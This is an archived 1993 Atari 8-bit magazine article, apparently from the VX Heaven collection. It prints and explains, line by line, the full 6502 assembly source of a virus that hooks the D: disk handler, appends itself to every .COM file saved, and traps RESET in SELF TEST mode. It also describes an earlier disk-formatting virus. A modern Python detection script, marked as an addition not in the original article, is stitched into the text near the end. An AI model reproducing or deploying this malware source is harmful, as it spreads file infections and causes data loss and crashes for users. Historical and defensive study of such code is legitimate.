
VX Heaven


Atari 8-bit virus

Pirx
Mega Magazine #6
October 1993


"New software from Poland (har!)"

One of the previous MegaZines contained several articles with titles containing the word "virus". Of course my curiosity was infinite! "Viruses on our favourite microcomputer?" - I thought - "That cannot be true!". And I was right... Those articles were about compression and other, after all, interesting subjects. But something happened - people in Poland began to talk about those dangerous life-forms. At first it was treated as a joke, but then one guy who writes games for Mirage Software accused another of damaging his precious data! That second guy, a well known musician, maintained that he had done nothing to erase any data. And here that famous word appeared for the first time in serious circumstances. The word "VIRUS".

Yes, that is no joke - a real, dangerous virus drew first blood in the XL/XE world. At last the Mirage guys "caught" it - this malicious piece of software was written in a very clever way. Located on the first page of memory ($0100 - the stack area) it worked with almost all modern XL/XE systems (i.e. those with QMEG OS) and surely on standard hardware. After every infection it increased a counter, and when the counter reached 10, the disk formatting process was activated. The virus was clever enough to do everything only during saving, when write protection was removed. I am not presenting the technical details because this evil-minded virus is very similar to the next one caught in Poland. Probably they have only one author...

The second one is very "popular" here since its source code was published in Poland's biggest XL/XE magazine (Tajemnice Atari - Mysteries of Atari), described in full detail. And this is why I decided to translate this article partially, including of course the source code. Unfortunately it was written using Quick Assembler - the own invention of the Avalon and Tajemnice Atari guys, but there should be no big trouble converting it to one of the standard (macro)assemblers.

The virus described below has only one purpose - to multiply itself - in its code there are no destructive sequences, but that doesn't mean it is safe. It causes extension of file length (it may fill up a disk faster than expected) and may crash the system because of its location - page six, which is heavily used by lots of applications. Our hero attacks only .COM files being saved to a disk drive (only the D: device). Its only wilful action is changing the RESET vectors to the SELF TEST address. On a non-altered XL/XE system it is necessary to turn off the computer (pressing the reset key causes a jump to SELF TEST again). Most people do not like turning their micros off and on, and after such an experience they will seldom reach for the reset key. And the virus only waits for that, because reset kills the bad animal. Sometimes it can slow down disk operations, but not always - the virus is written by a real expert with very good knowledge of the XL/XE operating system. I needn't mention that sometimes even an inconsiderable change in page six may cause a failure in I/O operations and damage to data on a disk.

And here comes the source code:

boot equ $09
dosi equ $0c
fcnt equ $1d
byte equ $1e
data equ $2f
htbs equ $31a
self equ $c901

     org $600

begn dta a(begn)
     dta a(begn+lgth-1)
 

This strange beginning is a repetition of the DOS header, which is at the beginning of the binary code of the virus. DOS does not load those headers into memory, so the virus must keep a copy itself in order to multiply in future. dta a(begn) means .word begn in MAC65, for example.

main equ *
* 'D' entry search
     ldx #0
dsrc lda htbs,x
     cmp #'D'
     beq foun
     inx
     inx
     inx
     cpx #36
     bcc dsrc
     rts
* trap table address
foun lda #6  page six!
     cmp htbs+2,x
     beq retu
     ldy #1
ttlp lda htbs+2,x
     sta addr,y
     lda mtad,y
     sta htbs+2,x
     dex
     dey
     bpl ttlp
retu rts
 

The address of the former (OS) handler is saved inside the DOPR routine in order to continue I/O operations as if nothing happened. The virus doesn't care about the previous values of the DOSI and BOOT vectors, but it is made to cause trouble...

This is the end of the virus installation. It found the address of the "D:" handler and changed it to its own. This is not performed if there is no "D:" device or the virus is already located on page 6. Now come the new I/O routines:

*---- open

xopn lda <self>
     sta dosi
     lda >self
     sta dosi+1
     ldy #2
     sty fcnt
     dey
     sty boot
     bpl dopr
 

Every opening of a file will set BOOT to 1 - this guarantees that after pressing RESET the system will jump through the DOSI vector. This is why one cannot get away from SELF TEST mode (on standard machines, of course...). Also one very important counter (FCNT) is initialized. FCNT is then used to determine whether the file begins with two $FF bytes (normally, only binary files have a header like this - $ff, $ff, <beg.adr, >beg.adr, <end.adr, >end.adr - those are the so-called .COM files (this is also known as DOS format)). At the end of the OPEN routine is a jump to DOPR with 1 in the Y register, which causes a jump to the original OPEN.

*---- put byte

xput ldy fcnt
     dey
     bmi gopu
     cmp #$ff
     beq *+4
     ldy #$ff
     sty fcnt
gopu ldy #7
     bpl dopr  (jmp)
 

A very interesting trick is used here: the FCNT counter equals zero after two $ff bytes have been sent. In any other case it is set to $ff. Both of those values prevent FCNT from changing in future. FCNT will serve as the file type flag in the CLOSE routine. A jump to DOPR with 7 in Y will of course continue the system PUT.

*---- close

xclo ldy fcnt
     bne gocl
     ldy #4
     sty byte
     jsr repl
     ldy #0
     sty fcnt
     ldy <lgth>
     sty byte
     jsr repl
     ldy <lgth-6>
     sty fcnt
     jsr repl
gocl ldy #3
     bpl dopr (jmp)
 

The close routine is simple but how efficient! The bacteria checks the file type and the current operation. For reading FCNT=2, and if the file is not .COM type, FCNT=$ff. Then the virus politely returns control to the original CLOSE. But FCNT=0 means saving a file in DOS format. At this point all data of the original file have been successfully transferred and now it is time for multiplying! It's not easy because the bacteria must generate not only its body but also a header and a run address, necessary for its future life... As before, the FCNT counter is cleverly used here: it is now equal to zero and points to the place from where copying will begin. The BYTE address fixes the end of the block for saving. The four byte long block is copied twice to provide a header for DOS and a copy for future generations. The same goes for the initialisation address at the end of the virus. The following routine saves one data block.

*---- body repl

loop inc fcnt
     lda begn,y
     jsr gopu
repl ldy fcnt
     cpy #byte
     bne  loop
     rts
 

It uses the PUT routine from the original "D:" handler. Communication with that handler is performed by the many times mentioned routine DOPR. Its parameter (stored in the Y register) is the index of the high byte of the given address in the handler table (1 for OPEN, 3 for CLOSE, 5 for GET, and so on).

*---- do std proc

xget ldy #5
     bpl dopr  (jmp)
xsta ldy #9
     bpl dopr  (jmp)
xspe ldy #11
dopr sta data
xadr lda *,y
addr equ *-2
     pha
     dey
     tya
     ror *
     bcc xadr
     lda data
     rts
 

Give your attention to the original loop construction, which is always executed two times, independently of the Y value (only for odd numbers). The ADDR label marks the argument of the previous LDA instruction (modified during installation - the first routine!).

*---- new table

mtad dta a(myta)
myta dta a(xopn-1)  0
     dta a(xclo-1)  2
     dta a(xget-1)  4
     dta a(xput-1)  6
     dta a(xsta-1)  8
     dta a(xspe-1)  a
 

XGET, XSTA and XSPE direct all functions not used by the virus to the original "D:" handler.

*---- init vect

     dta a($2e2)
     dta a($2e3)
     dta a(main)

*---- total lenght

lgth equ *-begn
 

The virus' body ends with the above initialisation block (for the next generation). The real initialisation is just after it:

*---- do it!

     org $2e2
     dta a(main)

     end
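As an added defensive example, not part of the original article or the Tajemnice Atari text: a Python scanner that parses the DOS-format segment layout described above and flags a file carrying the infection pattern left by the CLOSE routine, a body segment loaded at $0600 followed by a $2E2-$2E3 init segment pointing back into it. The sample files are constructed here; the names INITAD ($2E2) and RUNAD ($2E0) are standard Atari OS vector names that the article itself does not use.

```python
import struct

INITAD = 0x02E2                  # DOS init vector ($2E2/$2E3), run once its segment loads
PAGE_SIX = range(0x0600, 0x0700)

def parse_segments(data: bytes):
    """Split a DOS-format (.COM) file into (start, end, payload) segments:
    optional $FF $FF marker, 16-bit LE start, 16-bit LE end (inclusive), data."""
    segments, pos = [], 0
    while pos < len(data):
        if data[pos:pos + 2] == b"\xff\xff":      # marker may repeat before any segment
            pos += 2
        if pos + 4 > len(data):
            raise ValueError(f"truncated segment header at offset {pos}")
        start, end = struct.unpack_from("<HH", data, pos)
        pos += 4
        if end < start or pos + end - start + 1 > len(data):
            raise ValueError(f"bad or truncated segment ${start:04X}-${end:04X}")
        segments.append((start, end, data[pos:pos + end - start + 1]))
        pos += end - start + 1
    return segments

def init_target(segment):
    """INITAD value written by a segment covering $2E2-$2E3, else None."""
    start, end, payload = segment
    if start <= INITAD and end >= INITAD + 1:
        return struct.unpack_from("<H", payload, INITAD - start)[0]
    return None

def page_six_appender(data: bytes) -> bool:
    """True when a segment loaded at $0600 is later followed by an INITAD vector
    pointing into it: the body in page six plus the $2E2 init block the text describes."""
    segments = parse_segments(data)
    for i, (start, end, _) in enumerate(segments):
        if start == PAGE_SIX.start and end in PAGE_SIX:
            for later in segments[i + 1:]:
                target = init_target(later)
                if target is not None and start <= target <= end:
                    return True
    return False

def seg(start: int, payload: bytes) -> bytes:
    """One segment with its 4-byte header (helper for the constructed samples)."""
    return struct.pack("<HH", start, start + len(payload) - 1) + payload

# Constructed samples, not real files: a clean program at $2000 with a RUNAD ($2E0)
# vector, then the same file with a 16-byte dummy page-six body and INITAD -> $0604.
CLEAN = b"\xff\xff" + seg(0x2000, b"\xa9\x00\x60") + seg(0x02E0, struct.pack("<H", 0x2000))
INFECTED = CLEAN + seg(0x0600, bytes(16)) + seg(INITAD, struct.pack("<H", 0x0604))
```

Page six is also used legitimately by many programs, as the article notes, so a hit is a cue to inspect the appended segment rather than proof of infection.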
 

And that's all... Take care!!!! And notice the very advanced 6502 programming techniques! This piece of software is one of the most sophisticated programs I've ever seen...

I wish to thank Janusz B. Wisniewski for the original text (Tajemnice Atari 10/92). The translation was made WITHOUT the author's permission and authorisation. But the subject is worth this little crime.... Thanks!

Pirx of Our 5oft
